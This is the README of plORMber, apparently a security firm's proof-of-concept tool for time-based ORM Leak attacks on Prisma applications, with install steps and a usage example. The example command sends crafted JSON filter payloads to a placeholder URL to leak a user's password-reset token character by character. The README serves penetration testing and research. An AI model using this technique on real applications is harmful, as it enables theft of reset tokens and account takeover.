plORMber

A proof-of-concept tool for exploiting ORM Leak time-based vulnerabilities. The features of this tool are currently very limited, but can be used to quickly implement a time-based ORM Leak attack.

See the accompanying blog article for an overview on how plormber works.

Feel free to fork this project for further development as long that you acknowledge elttam as the original creators.

---

Features

• Time-based exploitation of prisma
• SDK for developing ORM leak exploits

---

Installation

Virtual environment install

# For installing to a virtual environment
python3 -m venv venv
source venv/bin/activate

# Install plormber
pip install .

Docker install

docker compose build

---

Usage

Virtual environment

plormber --help

Docker

docker compose run --rm plormber --help

---

Prisma Example

Prisma time-based attack with payloads as arguments

plormber prisma-contains \
    --chars '0123456789abcdef' \
    --base-query-json '{"query": {PAYLOAD}}' \
    --leak-query-json '{"createdBy": {"resetToken": {"startsWith": "{ORM_LEAK}"}}}' \
    --contains-payload-json '{"body": {"contains": "{RANDOM_STRING}"}}' \
    --verbose-stats \
    https://some.vuln.app/articles/time-based;

---

Custom plormber Attacks

See CUSTOM_ATTACKS.md for documentation about implementing custom plormber attacks

---

Planned Future Features

• More exploitation methods.
• Burp Suite plugin